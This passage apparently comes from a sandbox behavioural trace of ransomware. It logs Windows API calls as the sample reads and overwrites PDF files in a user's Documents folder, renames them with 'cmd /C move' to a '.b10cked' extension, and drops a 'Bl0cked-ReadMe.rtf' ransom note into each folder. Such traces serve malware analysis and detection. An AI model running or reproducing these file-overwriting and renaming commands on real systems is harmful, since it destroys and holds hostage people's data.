lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.306] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0xe008 [0138.306] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0138.307] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0138.307] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0138.307] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xe4f0 [0138.307] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0138.307] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0138.308] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0138.308] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xe4f0 [0138.308] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0138.308] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0138.308] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x7277, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x7277, lpOverlapped=0x0) returned 1 [0138.308] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0138.308] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x7277, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x7277, lpOverlapped=0x0) returned 1 [0138.308] SetFilePointer (in: hFile=0x114, lDistanceToMove=-29303, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x7279 [0138.308] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x7277, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x7277, lpOverlapped=0x0) returned 1 [0138.309] SetFilePointer (in: hFile=0x114, lDistanceToMove=-29303, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x7279 [0138.309] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x7277, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x7277, lpOverlapped=0x0) returned 1 [0138.312] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tgRDf2UBQ_aR.pdf", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0138.312] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tgRDf2UBQ_aR.pdf", cchWideChar=16, lpMultiByteStr=0x1328834, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tgRDf2UBQ_aR.pdf", lpUsedDefaultChar=0x0) returned 16 [0138.312] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xe4f0 [0138.313] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0138.313] CloseHandle (hObject=0x114) returned 1 [0138.314] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\tgRDf2UBQ_aR.pdf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\TGRDF2~1.PDF") returned 0x48 [0138.314] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\") returned 0x3c [0138.315] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\TGRDF2~1.PDF\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\tgRDf2UBQ_aR.pdf.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\TGRDF2~1.PDF\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\tgRDf2UBQ_aR.pdf.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xf54, dwThreadId=0xf44)) returned 1 [0138.333] CloseHandle (hObject=0x110) returned 1 [0138.333] CloseHandle (hObject=0x114) returned 1 [0138.333] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\", cchLength=0x58 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\NRWDONYDB2-UAOUM\\1VHPWYXY0YNVR KBAEH\\") returned 0x58 [0138.333] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\", cchLength=0x2f | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\") returned 0x2f [0138.333] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\NRWDONYDB2-UAOUM\\1VHPWYXY0YNVR KBAEH\\", cchCount1=88, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\", cchCount2=47) returned 1 [0138.333] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\", cchLength=0x58 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\NRWDONYDB2-UAOUM\\1VHPWYXY0YNVR KBAEH\\") returned 0x58 [0138.333] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0138.333] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\NRWDONYDB2-UAOUM\\1VHPWYXY0YNVR KBAEH\\", cchCount1=88, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0138.333] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0138.333] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0138.333] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0138.333] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\") returned 0x3c [0138.334] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0138.334] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0138.334] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x110, hThread=0x114, dwProcessId=0xf68, dwThreadId=0xf64)) returned 1 [0138.346] CloseHandle (hObject=0x110) returned 1 [0138.346] CloseHandle (hObject=0x114) returned 1 [0138.347] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\5oweksadhmyqwxms\\nrwdonydb2-uaoum\\1vhpwyxy0ynvr kbaeh\\bl0cked-readme.rtf")) returned 0x20 [0138.347] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0138.347] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0138.347] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0138.347] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.347] ReleaseMutex (hMutex=0xf8) returned 1 [0138.347] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.347] ReleaseMutex (hMutex=0xf8) returned 1 [0138.347] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.347] ReleaseMutex (hMutex=0xf8) returned 1 [0138.347] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.347] ReleaseMutex (hMutex=0xf8) returned 1 [0138.347] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\Thcv85KW1KoWsUQP.pdf" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\5oweksadhmyqwxms\\thcv85kw1kowsuqp.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0138.347] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.347] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x747b [0138.347] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.347] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=19513660180) returned 1 [0138.347] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.347] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x747b [0138.348] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.348] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.348] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x747b [0138.348] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.348] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0138.348] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x747b [0138.348] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0138.348] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.348] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x747b [0138.348] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.348] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.348] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x747b [0138.348] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.348] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.348] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x747b [0138.348] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.348] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.348] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x747b [0138.348] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.348] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.348] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x747b [0138.348] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.349] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.349] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x747b [0138.349] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.349] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x6f93 [0138.349] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0138.350] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0138.350] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0138.350] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x747b [0138.350] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0138.350] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0138.350] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0138.350] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x747b [0138.350] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0138.350] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0138.350] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x3a3c, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x3a3c, lpOverlapped=0x0) returned 1 [0138.350] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0138.350] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x3a3c, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x3a3c, lpOverlapped=0x0) returned 1 [0138.350] SetFilePointer (in: hFile=0x114, lDistanceToMove=-14908, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x3a3f [0138.350] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x3a3c, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x3a3c, lpOverlapped=0x0) returned 1 [0138.351] SetFilePointer (in: hFile=0x114, lDistanceToMove=-14908, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x3a3f [0138.351] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x3a3c, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x3a3c, lpOverlapped=0x0) returned 1 [0138.355] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Thcv85KW1KoWsUQP.pdf", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0138.355] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Thcv85KW1KoWsUQP.pdf", cchWideChar=20, lpMultiByteStr=0x1328834, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Thcv85KW1KoWsUQP.pdf", lpUsedDefaultChar=0x0) returned 20 [0138.355] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x747b [0138.355] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0138.356] CloseHandle (hObject=0x114) returned 1 [0138.356] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\Thcv85KW1KoWsUQP.pdf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\THCV85~1.PDF") returned 0x36 [0138.357] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\") returned 0x2a [0138.357] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\THCV85~1.PDF\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Thcv85KW1KoWsUQP.pdf.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\THCV85~1.PDF\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Thcv85KW1KoWsUQP.pdf.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0x638, 